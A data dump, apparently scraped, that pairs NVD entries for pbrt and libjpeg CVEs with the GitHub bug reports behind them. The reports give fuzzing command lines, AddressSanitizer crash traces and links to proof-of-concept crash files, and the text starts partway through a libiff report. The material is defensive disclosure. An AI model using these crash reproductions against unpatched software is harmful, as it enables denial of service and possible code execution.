00 00 00 07 0x0ffea5133040: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffea5133050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffea5133060: 00 00 00 00 f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 =>0x0ffea5133070: 00 00 00 00[01]f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 0x0ffea5133080: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 0x0ffea5133090: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 0x0ffea51330a0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 0x0ffea51330b0: f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9 04 f9 f9 f9 0x0ffea51330c0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==2975==ABORTING ``` ## POC [global-overflow-IFF_errorId-error-46.zip](https://github.com/svanderburg/libiff/files/5020583/global-overflow-IFF_errorId-error-46.zip)
A global-buffer-overflow in error.c:46:18
https://api.github.com/repos/svanderburg/libiff/issues/10/comments
0
2020-08-04T06:53:28Z
2020-08-04T06:53:28Z
https://github.com/svanderburg/libiff/issues/10
672,552,072
10
2,535
CVE-2021-32299
2021-09-20T16:15:11.050
An issue was discovered in pbrt through 20200627. A stack-buffer-overflow exists in the function pbrt::ParamSet::ParamSet() located in paramset.h. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mmp/pbrt-v3/issues/296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mmp/pbrt-v3/issues/296" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pbrt_project:pbrt:*:*:*:*:*:*:*:*", "matchCriteriaId": "5593DE2A-56F7-46F9-8A52-64281B9F2CD5", "versionEndExcluding": null, "versionEndIncluding": "20200627", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/mmp/pbrt-v3/issues/296
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mmp", "pbrt-v3" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pbrt (latest master [aaa552](https://github.com/mmp/pbrt-v3/commit/aaa552a4b9cbf9dccb71450f47b268e0ed6370e2)) ## Configure cmake ../srcs -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/pbrt --quick ./scenes/killeroo-simple.pbrt --outfile /tmp/pbrt ## AddressSanitizer output ``` ================================================================= ==36886==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffec8b190e0 at pc 0x0000006463fc bp 0x7ffec8b17c80 sp 0x7ffec8b17c70 WRITE of size 8 at 0x7ffec8b190e0 thread T0 #0 0x6463fb in std::_Vector_base<std::shared_ptr<pbrt::ParamSetItem<bool> >, std::allocator<std::shared_ptr<pbrt::ParamSetItem<bool> > > >::_Vector_impl::_Vector_impl() /usr/include/c++/5/bits/stl_vector.h:87 #1 0x6463fb in std::_Vector_base<std::shared_ptr<pbrt::ParamSetItem<bool> >, std::allocator<std::shared_ptr<pbrt::ParamSetItem<bool> > > >::_Vector_base() /usr/include/c++/5/bits/stl_vector.h:125 #2 0x6463fb in std::vector<std::shared_ptr<pbrt::ParamSetItem<bool> >, std::allocator<std::shared_ptr<pbrt::ParamSetItem<bool> > > >::vector() /usr/include/c++/5/bits/stl_vector.h:257 #3 0x6463fb in pbrt::ParamSet::ParamSet() /home/seviezhou/pbrt/src/core/paramset.h:56 #4 0x6463fb in parseParams<std::function<pbrt::string_view(int)>, pbrt::parse(std::unique_ptr<pbrt::Tokenizer>)::<lambda(pbrt::string_view)> > /home/seviezhou/pbrt/src/core/parser.cpp:714 #5 0x65e390 in operator() /home/seviezhou/pbrt/src/core/parser.cpp:848 #6 0x65e390 in parse /home/seviezhou/pbrt/src/core/parser.cpp:909 #7 0x666aca in pbrt::pbrtParseFile(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) /home/seviezhou/pbrt/src/core/parser.cpp:1101 #8 0x48cb36 in main /home/seviezhou/pbrt/src/main/pbrt.cpp:169 #9 0x7f6786b2b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #10 0x4a9538 in _start (/home/seviezhou/pbrt/build/pbrt+0x4a9538) Address 0x7ffec8b190e0 is located in stack of thread T0 at offset 3232 in frame #0 0x65784f in parse /home/seviezhou/pbrt/src/core/parser.cpp:786 This frame has 93 object(s): [64, 65) 'ungetTokenSet' [128, 132) '__args#0' [192, 196) '__args#0' [256, 260) '__args#0' [320, 324) '__args#0' [384, 388) '__args#0' [448, 452) '__args#0' [512, 516) '__args#0' [576, 580) '__args#0' [640, 644) '__args#0' [704, 708) '__args#0' [768, 772) '__args#0' [832, 836) '__args#0' [896, 900) '__args#0' [960, 964) '__args#0' [1024, 1028) '__args#0' [1088, 1092) '__args#0' [1152, 1156) '__args#0' [1216, 1220) '__args#0' [1280, 1284) '__args#0' [1344, 1348) '__args#0' [1408, 1412) '__args#0' [1472, 1476) '__args#0' [1536, 1540) '__args#0' [1600, 1604) '__args#0' [1664, 1668) '__args#0' [1728, 1732) '__args#0' [1792, 1796) '__args#0' [1856, 1860) '__args#0' [1920, 1928) '__dnew' [1984, 1992) '__dnew' [2048, 2056) '__dnew' [2112, 2120) '__dnew' [2176, 2184) '__dnew' [2240, 2248) '__dnew' [2304, 2312) '__dnew' [2368, 2376) '__dnew' [2432, 2440) '__dnew' [2496, 2504) '__dnew' [2560, 2568) '__dnew' [2624, 2632) '__dnew' [2688, 2696) '__dnew' [2752, 2760) '__dnew' [2816, 2824) '__dnew' [2880, 2896) 'ungetToken' [2944, 2968) 'fileStack' [3008, 3032) 'basicParamListEntrypoint' [3072, 3200) 'arena' [3264, 3496) 'params' <== Memory access at offset 3232 underflows this variable [3552, 3816) 'params' [3872, 4136) 'params' [4192, 4456) 'params' [4512, 4776) 'params' [4832, 4840) 'v' [4896, 4908) 'v' [4960, 4976) 'v' [5024, 5056) 'ungetTokenValue' [5088, 5120) 'nextToken' [5152, 5184) '<unknown>' [5216, 5248) '<unknown>' [5280, 5312) '<unknown>' [5344, 5376) '<unknown>' [5408, 5440) '<unknown>' [5472, 5504) '<unknown>' [5536, 5568) '<unknown>' [5600, 5632) '<unknown>' [5664, 5696) '<unknown>' [5728, 5760) '<unknown>' [5792, 5824) '<unknown>' [5856, 5888) '<unknown>' [5920, 5952) 'n' [5984, 6016) '<unknown>' [6048, 6080) '<unknown>' [6112, 6144) 'n' [6176, 6208) '<unknown>' [6240, 6272) '<unknown>' [6304, 6336) '<unknown>' [6368, 6400) 'n' [6432, 6464) '<unknown>' [6496, 6528) '<unknown>' [6560, 6592) '<unknown>' [6624, 6656) '<unknown>' [6688, 6720) '<unknown>' [6752, 6784) '<unknown>' [6816, 6848) '<unknown>' [6880, 6912) 'n' [6944, 6976) '<unknown>' [7008, 7040) '<unknown>' [7072, 7104) 'n' [7136, 7168) 'filename' [7200, 7232) '<unknown>' [7264, 7300) 'v' [7360, 7424) 'm' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /usr/include/c++/5/bits/stl_vector.h:87 std::_Vector_base<std::shared_ptr<pbrt::ParamSetItem<bool> >, std::allocator<std::shared_ptr<pbrt::ParamSetItem<bool> > > >::_Vector_impl::_Vector_impl() Shadow bytes around the buggy address: 0x10005915b1c0: 00 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 0x10005915b1d0: 00 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 0x10005915b1e0: 00 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 0x10005915b1f0: 00 00 f4 f4 f2 f2 f2 f2 00 00 00 f4 f2 f2 f2 f2 0x10005915b200: 00 00 00 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 00 =>0x10005915b210: 00 00 00 00 00 00 00 00 f2 f2 f2 f2[f2]f2 f2 f2 0x10005915b220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005915b230: 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 f4 f4 0x10005915b240: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 0x10005915b250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005915b260: 00 00 00 00 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==36886==ABORTING ``` ## POC [stack-overflow-ParamSet-paramset-56.zip](https://github.com/mmp/pbrt-v3/files/5021122/stack-overflow-ParamSet-paramset-56.zip)
A stack-buffer-overflow in paramset.h:56 with default test case
https://api.github.com/repos/mmp/pbrt-v3/issues/296/comments
0
2020-08-04T08:57:10Z
2020-08-04T08:57:10Z
https://github.com/mmp/pbrt-v3/issues/296
672,626,915
296
2,536
CVE-2021-39514
2021-09-20T16:15:11.557
An issue was discovered in libjpeg through 2020021. An uncaught floating point exception in the function ACLosslessScan::ParseMCU() located in aclosslessscan.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/thorfdbg/libjpeg/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` *** Warning -1038 in Frame::ParseTrailer, line 1083, file frame.cpp *** Reason is: missing an EOI marker at the end of the stream *** Warning -1038 in Image::ParseTrailer, line 1464, file image.cpp *** Reason is: expecting an EOI marker at the end of the stream Segmentation fault ``` ## AddressSanitizer output ``` ================================================================= ==74952==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00001f774 at pc 0x0000004f2c69 bp 0x7ffcf95a51b0 sp 0x7ffcf95a51a0 READ of size 4 at 0x61a00001f774 thread T0 #0 0x4f2c68 in ACLosslessScan::ParseMCU(Line**, Line**) /home/seviezhou/libjpeg/codestream/aclosslessscan.cpp:349 #1 0x4f3385 in ACLosslessScan::ParseMCU() /home/seviezhou/libjpeg/codestream/aclosslessscan.cpp:471 #2 0x45c4b4 in JPEG::ReadInternal(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:345 #3 0x45d5be in JPEG::Read(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:210 #4 0x42adbf in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:121 #5 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #6 0x7f2ee6e9783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) 0x61a00001f774 is located 0 bytes to the right of 1268-byte region [0x61a00001f280,0x61a00001f774) allocated by thread T0 here: #0 0x7f2ee79c5602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x44cadf in Environ::CoreAllocMem(unsigned int, unsigned int) /home/seviezhou/libjpeg/tools/environment.cpp:664 #2 0x4ef428 in ACLosslessScan::FindComponentDimensions() /home/seviezhou/libjpeg/codestream/aclosslessscan.cpp:130 #3 0x4ef63c in ACLosslessScan::StartParseScan(ByteStream*, Checksum*, BufferCtrl*) /home/seviezhou/libjpeg/codestream/aclosslessscan.cpp:143 #4 0x533499 in Frame::StartParseScan(ByteStream*, Checksum*) /home/seviezhou/libjpeg/marker/frame.cpp:847 #5 0x45bec4 in JPEG::ReadInternal(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:296 #6 0x45d5be in JPEG::Read(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:210 #7 0x42adbf in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:121 #8 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #9 0x7f2ee6e9783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libjpeg/codestream/aclosslessscan.cpp:349 ACLosslessScan::ParseMCU(Line**, Line**) Shadow bytes around the buggy address: 0x0c347fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c347fffbee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa 0x0c347fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==74952==ABORTING ``` ## POC [heap-overflow-ParseMCU-aclosslessscan-349.zip](https://github.com/thorfdbg/libjpeg/files/5019809/heap-overflow-ParseMCU-aclosslessscan-349.zip)
A heap overflow in aclosslessscan.cpp:349 causes segment fault
https://api.github.com/repos/thorfdbg/libjpeg/issues/36/comments
2
2020-08-04T02:48:57Z
2021-10-08T06:24:14Z
https://github.com/thorfdbg/libjpeg/issues/36
672,464,794
36
2,537
CVE-2021-39515
2021-09-20T16:15:11.597
An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function SampleInterleavedLSScan::ParseMCU() located in sampleinterleavedlsscan.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/37" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/37" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/thorfdbg/libjpeg/issues/37
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` Segmentation fault ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==81357==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005200b8 bp 0x7ffdd2f954b0 sp 0x7ffdd2f95110 T0) #0 0x5200b7 in SampleInterleavedLSScan::ParseMCU() /home/seviezhou/libjpeg/codestream/sampleinterleavedlsscan.cpp:133 #1 0x45c4b4 in JPEG::ReadInternal(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:345 #2 0x45d5be in JPEG::Read(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:210 #3 0x42adbf in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:121 #4 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #5 0x7ff8b3e8083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #6 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libjpeg/codestream/sampleinterleavedlsscan.cpp:133 SampleInterleavedLSScan::ParseMCU() ==81357==ABORTING ``` ## POC [SEGV-ParseMCU-sampleinterleavedlsscan-133.zip](https://github.com/thorfdbg/libjpeg/files/5022167/SEGV-ParseMCU-sampleinterleavedlsscan-133.zip)
Segmentation fault in sampleinterleavedlsscan.cpp:133
https://api.github.com/repos/thorfdbg/libjpeg/issues/37/comments
3
2020-08-04T12:51:56Z
2020-09-25T07:07:23Z
https://github.com/thorfdbg/libjpeg/issues/37
672,768,766
37
2,538
CVE-2021-39516
2021-09-20T16:15:11.640
An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function HuffmanDecoder::Get() located in huffmandecoder.hpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/thorfdbg/libjpeg/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==12664==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000001d2 (pc 0x0000004a33fc bp 0x7ffed315df90 sp 0x7ffed315df70 T0) #0 0x4a33fb in HuffmanDecoder::Get(BitStream<false>*) ../coding/huffmandecoder.hpp:112 #1 0x4fdeaa in RefinementScan::DecodeBlock(int*, HuffmanDecoder*, unsigned short&) /home/seviezhou/libjpeg/codestream/refinementscan.cpp:644 #2 0x4ff7fc in RefinementScan::ParseMCU() /home/seviezhou/libjpeg/codestream/refinementscan.cpp:314 #3 0x45c4b4 in JPEG::ReadInternal(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:345 #4 0x45d5be in JPEG::Read(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:210 #5 0x42adbf in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:121 #6 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #7 0x7fd6ee82983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #8 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../coding/huffmandecoder.hpp:112 HuffmanDecoder::Get(BitStream<false>*) ==12664==ABORTING ``` ## POC [SEGV-DecodeBlock-refinementscan-644.zip](https://github.com/thorfdbg/libjpeg/files/5067107/SEGV-DecodeBlock-refinementscan-644.zip)
Segmentation fault in refinementscan.cpp:644
https://api.github.com/repos/thorfdbg/libjpeg/issues/42/comments
1
2020-08-13T04:27:58Z
2020-08-28T18:07:17Z
https://github.com/thorfdbg/libjpeg/issues/42
678,140,262
42
2,539
CVE-2021-39517
2021-09-20T16:15:11.683
An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::ReconstructUnsampled() located in blockbitmaprequester.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/thorfdbg/libjpeg/issues/33
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
